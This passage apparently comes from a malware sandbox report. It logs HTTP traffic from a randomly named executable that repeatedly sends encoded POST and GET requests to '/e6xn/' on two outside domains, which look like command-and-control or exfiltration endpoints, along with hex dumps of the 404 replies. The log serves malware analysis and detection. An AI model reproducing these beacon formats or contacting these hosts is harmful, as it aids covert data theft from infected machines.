                                                                                  Data Raw: 62 76 4f 74 3d 70 78 42 66 5a 4d 36 45 46 36 33 4d 39 52 54 5a 77 64 46 74 7a 50 7a 58 76 64 46 7a 56 45 52 49 64 50 53 7a 4c 2b 2b 57 6f 66 66 65 74 41 64 42 6b 50 35 56 34 73 39 43 54 76 66 2b 55 53 49 6e 67 78 77 68 2f 2f 47 34 38 4d 42 74 4e 64 44 44 78 38 49 70 38 7a 79 72 6d 42 6c 4c 6e 77 53 4c 69 45 2f 71 32 36 39 47 45 34 4d 73 6c 33 7a 77 78 73 50 33 69 79 30 4a 77 37 56 66 64 76 55 43 76 30 4c 35 68 6b 51 58 69 30 41 79 4e 44 43 4d 6d 48 5a 79 4c 50 6a 52 42 55 2b 39 41 43 37 38 38 6b 67 70 49 68 4f 64 6e 64 77 66 2b 50 51 6b 69 38 56 78 39 54 4c 45 53 6f 54 49
                                                                                  Data Ascii: bvOt=pxBfZM6EF63M9RTZwdFtzPzXvdFzVERIdPSzL++WoffetAdBkP5V4s9CTvf+USIngxwh//G48MBtNdDDx8Ip8zyrmBlLnwSLiE/q269GE4Msl3zwxsP3iy0Jw7VfdvUCv0L5hkQXi0AyNDCMmHZyLPjRBU+9AC788kgpIhOdndwf+PQki8Vx9TLESoTI
                                                                                  Mar 18, 2024 14:48:20.349200010 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:48:20 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.1049750154.7.21.55806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:22.873090982 CET799OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.supportstuiwords.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.supportstuiwords.com
                                                                                  Referer: http://www.supportstuiwords.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 70 78 42 66 5a 4d 36 45 46 36 33 4d 79 53 62 5a 79 38 46 74 78 76 7a 59 7a 4e 46 7a 41 30 52 79 64 4f 75 7a 4c 36 6e 54 6f 4e 37 65 74 67 4e 42 72 72 74 56 32 4d 39 43 4b 66 66 69 65 79 49 38 67 78 38 66 2f 2f 71 34 38 4d 56 74 4e 63 7a 44 78 4c 30 71 2b 6a 79 70 39 78 6c 4a 70 51 53 4c 69 45 2f 71 32 36 42 34 45 34 55 73 35 58 76 77 79 50 58 77 6f 53 30 4b 34 62 56 66 5a 76 55 47 76 30 4c 48 68 6c 38 39 69 79 4d 79 4e 43 79 4d 6d 56 78 31 43 50 6a 62 4e 45 2f 32 50 78 43 65 6d 33 41 70 46 54 47 74 34 66 6b 44 77 4f 78 6a 7a 74 30 6d 75 6b 58 4b 63 75 6d 69 53 4d 4c 39 32 46 78 43 79 65 41 53 77 6e 44 76 72 58 59 45 65 41 3d 3d
                                                                                  Data Ascii: bvOt=pxBfZM6EF63MySbZy8FtxvzYzNFzA0RydOuzL6nToN7etgNBrrtV2M9CKffieyI8gx8f//q48MVtNczDxL0q+jyp9xlJpQSLiE/q26B4E4Us5XvwyPXwoS0K4bVfZvUGv0LHhl89iyMyNCyMmVx1CPjbNE/2PxCem3ApFTGt4fkDwOxjzt0mukXKcumiSML92FxCyeASwnDvrXYEeA==
                                                                                  Mar 18, 2024 14:48:23.029356956 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:48:22 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.1049751154.7.21.55806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:25.558198929 CET1812OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.supportstuiwords.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.supportstuiwords.com
                                                                                  Referer: http://www.supportstuiwords.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 70 78 42 66 5a 4d 36 45 46 36 33 4d 79 53 62 5a 79 38 46 74 78 76 7a 59 7a 4e 46 7a 41 30 52 79 64 4f 75 7a 4c 36 6e 54 6f 4e 7a 65 74 54 56 42 71 4b 74 56 31 4d 39 43 56 76 66 79 65 79 4a 2b 67 78 56 59 2f 2f 58 4e 38 50 74 74 4c 36 48 44 35 61 30 71 33 6a 79 70 31 52 6c 4b 6e 77 53 6b 69 45 75 68 32 2b 68 34 45 34 55 73 35 56 62 77 6d 4d 50 77 75 53 30 4a 77 37 55 65 64 76 56 62 76 30 43 38 68 6c 49 48 69 43 73 79 4d 69 69 4d 6b 68 52 31 41 76 6a 64 4f 45 2f 6c 50 77 2b 6f 6d 33 4e 53 46 53 79 4c 34 64 6b 44 79 2f 77 6e 30 4e 41 62 73 69 33 65 43 5a 53 49 58 35 2f 44 32 48 4d 30 6d 4c 51 46 6b 48 4f 54 67 7a 49 4c 45 43 38 4e 4b 74 69 54 39 7a 54 57 51 63 70 48 4b 70 4d 4d 79 4e 61 33 68 43 31 58 4f 30 56 57 75 35 57 50 69 4b 2f 50 75 4b 4a 61 4e 72 72 51 77 42 6c 70 4a 31 5a 68 62 76 53 5a 71 74 75 62 48 66 69 50 6e 45 32 75 30 79 7a 42 6a 31 73 69 67 62 46 62 31 71 6f 7a 64 76 6b 6a 70 6b 56 44 57 70 53 59 75 75 63 44 49 74 48 6a 43 57 55 63 31 59 4e 6c 47 78 56 68 4d 53 44 42 35 7a 48 51 66 48 51 62 63 4d 71 4d 56 71 4a 4f 43 6e 54 37 4b 38 61 6f 54 46 70 43 2f 55 6f 68 56 44 73 70 37 2b 33 59 75 78 47 2f 41 59 42 70 32 69 72 59 66 45 6f 50 43 4d 64 78 58 36 6e 44 45 4b 57 52 4b 39 6d 52 59 69 56 48 42 42 5a 6a 30 6c 54 43 44 38 52 72 69 30 4c 77 46 62 32 4c 68 73 4b 67 72 42 53 55 6d 6c 6e 4c 32 7a 32 31 71 30 6c 65 51 47 32 4a 32 34 61 68 56 4d 51 46 75 72 63 68 6e 53 71 51 6f 42 71 73 48 35 50 74 30 46 70 30 65 69 38 70 36 61 66 6d 32 6f 53 71 78 49 77 54 4d 2f 7a 74 7a 4a 75 75 78 75 70 4b 56 43 37 75 59 4e 66 48 46 6c 79 6b 65 6f 4b 51 65 32 48 38 57 34 73 47 74 6b 71 4b 54 4f 38 66 6e 6c 6f 4d 61 6e 56 51 42 58 74 32 68 6c 77 31 67 39 4b 69 38 56 47 50 48 5a 6d 64 70 39 4f 66 6b 67 30 5a 36 79 2f 53 37 6e 31 38 7a 4e 54 6a 51 2f 2b 43 4a 77 71 47 6e 49 6f 30 58 59 4e 4d 39 69 47 4c 59 2f 6a 6e 79 77 7a 6a 7a 64 62 35 78 6c 4d 62 6e 50 43 64 65 49 36 62 50 55 4f 56 4f 4c 56 34 42 44 32 59 38 39 71 6f 75 69 76 70 61 76 4b 36 62 49 76 4b 7a 61 6e 69 55 48 67 43 46 42 42 74 4d 33 70 51 2f 5a 4e 30 38 51 45 78 31 56 62 79 57 48 73 4a 48 76 53 4c 52 75 7a 6d 2f 42 75 36 53 6c 71 31 53 70 4c 39 54 6f 78 78 72 5a 2f 53 57 75 71 44 74 41 41 4c 47 50 77 52 7a 7a 67 45 74 51 35 6e 76 34 68 6b 38 33 2b 30 6f 2b 69 72 7a 37 69 4d 4e 4a 35 63 75 5a 52 78 2b 47 75 7a 30 6c 6a 4b 32 59 74 5a 48 71 58 33 6b 64 70 54 56 6e 6c 2b 38 6c 37 6f 61 74 63 4d 54 4b 43 61 6c 4d 49 32 2f 49 5a 46 72 2b 49 4a 43 4d 76 6b 73 4f 68 37 6d 54 78 46 61 65 63 4b 61 54 41 75 43 7a 48 72 66 73 74 2f 4c 76 34 58 58 77 56 6f 7a 4b 33 57 68 44 6b 44 73 6d 6a 6e 73 73 72 48 57 42 51 62 61 62 75 4d 6d 6e 78 4c 32 63 75 49 46 4a 35 4a 76 34 51 7a 47 6c 41 34 35 50 61 32 39 4e 39 4a 2b 4c 73 4b 74 53 41 42 33 6f 63 4a 57 76 4c 69 64 44 77 47 42 35 39 6a 42 4f 2b 49 49 41 4c 4a 64 32 75 62 62 57 7a 7a 47 33 43 4a 6d 38 50 51 55 53 35 6f 65 37 61 51 77 51 31 57 77 2f 6b 65 76 68 37 31 7a 50 2f 39 6d 7a 44 47 63 78 72 68 6f 6c 41 70 35 47 5a 33 31 4e 42 59 58 77 57 4b 6a 4a 4b 38 56 6f 54 63 2b 53 54 32 47 6d 4b 39 76 53 56 4f 76 6b 4a 63 49 76 74 43 55 65 4a 47 72 35 6f 42 69 4b 6f 5a 61 32 2b 48 6d 68 4b 6f 4a 4c 6f 74 57 49 54 6f 6d 5a 4e 4f 2b 57 4b 48 41 38 46 73 4e 47 36 33 34 59 49 54 39 4a 71 55 49 76 62 63 54 69 6c 44 4e 59 6d 75 41 73 31 6b 32 37 34 38 78 73 6d 4b 66 65 73 2b 64 30 6c 7a 73 53 4c 35 56 44 54 54 79 64 4c 59 47 4f 37 67 66 33 38 54 4d 4e 70 59 69 61 74 51 2f 64 56 51 79 78 79 58 6e 72 75 6c 49 78 6b 45 79 41 37 56 50 5a 64 5a 58 48 4c 6c 53 7a 4c 58 44 62 4a 64 35 51 58 37 4e 37 59 46 6a 73 66 6c 32 2b 6a 46 70 48 42 36 58 66 74 34 78 46 71 53 37 63 45 4b 53 46 51 6b 44 69 78 41 4f 65 78 52 35 32 55 51 75 6b 67 3d
                                                                                  Data Ascii: bvOt=pxBfZM6EF63MySbZy8FtxvzYzNFzA0RydOuzL6nToNzetTVBqKtV1M9CVvfyeyJ+gxVY//XN8PttL6HD5a0q3jyp1RlKnwSkiEuh2+h4E4Us5VbwmMPwuS0Jw7UedvVbv0C8hlIHiCsyMiiMkhR1AvjdOE/lPw+om3NSFSyL4dkDy/wn0NAbsi3eCZSIX5/D2HM0mLQFkHOTgzILEC8NKtiT9zTWQcpHKpMMyNa3hC1XO0VWu5WPiK/PuKJaNrrQwBlpJ1ZhbvSZqtubHfiPnE2u0yzBj1sigbFb1qozdvkjpkVDWpSYuucDItHjCWUc1YNlGxVhMSDB5zHQfHQbcMqMVqJOCnT7K8aoTFpC/UohVDsp7+3YuxG/AYBp2irYfEoPCMdxX6nDEKWRK9mRYiVHBBZj0lTCD8Rri0LwFb2LhsKgrBSUmlnL2z21q0leQG2J24ahVMQFurchnSqQoBqsH5Pt0Fp0ei8p6afm2oSqxIwTM/ztzJuuxupKVC7uYNfHFlykeoKQe2H8W4sGtkqKTO8fnloManVQBXt2hlw1g9Ki8VGPHZmdp9Ofkg0Z6y/S7n18zNTjQ/+CJwqGnIo0XYNM9iGLY/jnywzjzdb5xlMbnPCdeI6bPUOVOLV4BD2Y89qouivpavK6bIvKzaniUHgCFBBtM3pQ/ZN08QEx1VbyWHsJHvSLRuzm/Bu6Slq1SpL9ToxxrZ/SWuqDtAALGPwRzzgEtQ5nv4hk83+0o+irz7iMNJ5cuZRx+Guz0ljK2YtZHqX3kdpTVnl+8l7oatcMTKCalMI2/IZFr+IJCMvksOh7mTxFaecKaTAuCzHrfst/Lv4XXwVozK3WhDkDsmjnssrHWBQbabuMmnxL2cuIFJ5Jv4QzGlA45Pa29N9J+LsKtSAB3ocJWvLidDwGB59jBO+IIALJd2ubbWzzG3CJm8PQUS5oe7aQwQ1Ww/kevh71zP/9mzDGcxrholAp5GZ31NBYXwWKjJK8VoTc+ST2GmK9vSVOvkJcIvtCUeJGr5oBiKoZa2+HmhKoJLotWITomZNO+WKHA8FsNG634YIT9JqUIvbcTilDNYmuAs1k2748xsmKfes+d0lzsSL5VDTTydLYGO7gf38TMNpYiatQ/dVQyxyXnrulIxkEyA7VPZdZXHLlSzLXDbJd5QX7N7YFjsfl2+jFpHB6Xft4xFqS7cEKSFQkDixAOexR52UQukg=
                                                                                  Mar 18, 2024 14:48:25.712778091 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:48:25 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.1049752154.7.21.55806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:28.230214119 CET506OUTGET /e6xn/?bvOt=kzp/a47TZoeooijf6PAMz/PnwNMdJTtRUuOJK4qo3trrvBMD8vtq5KxCd9qMSTo59iVH98TL2IBESMiQybod0ACy6WBPglHFi3698tluOY189mrwzA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.supportstuiwords.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:48:28.384726048 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:48:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.104975350.6.160.34806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:33.723190069 CET769OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.syscomputerrd.info
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.syscomputerrd.info
                                                                                  Referer: http://www.syscomputerrd.info/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 34 57 38 34 45 77 47 41 4c 4e 41 66 59 67 72 64 66 63 43 47 79 36 4b 72 5a 4f 35 53 67 78 54 63 5a 66 33 61 48 30 69 4e 75 39 39 76 4b 32 49 6d 34 39 6e 6a 63 57 6a 32 38 68 51 31 77 34 62 67 45 32 75 72 59 50 62 67 2b 47 39 56 78 65 38 64 36 2b 38 45 78 36 32 56 62 51 76 41 41 44 31 4c 34 4d 61 2f 37 67 70 4d 70 32 51 42 76 66 66 6e 51 37 51 36 2f 4b 6e 39 4b 63 30 6e 55 56 2f 6e 63 63 74 49 50 57 45 6f 4b 67 69 62 39 64 37 7a 78 65 79 76 78 55 43 44 55 52 74 4e 6c 6b 61 53 33 70 44 44 7a 43 48 33 51 45 72 36 79 48 6f 4e 72 52 6c 4a 2f 39 65 33 47 2f 61 73
                                                                                  Data Ascii: bvOt=4W84EwGALNAfYgrdfcCGy6KrZO5SgxTcZf3aH0iNu99vK2Im49njcWj28hQ1w4bgE2urYPbg+G9Vxe8d6+8Ex62VbQvAAD1L4Ma/7gpMp2QBvffnQ7Q6/Kn9Kc0nUV/ncctIPWEoKgib9d7zxeyvxUCDURtNlkaS3pDDzCH3QEr6yHoNrRlJ/9e3G/as
                                                                                  Mar 18, 2024 14:48:34.158616066 CET1286INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:48:33 GMT
                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
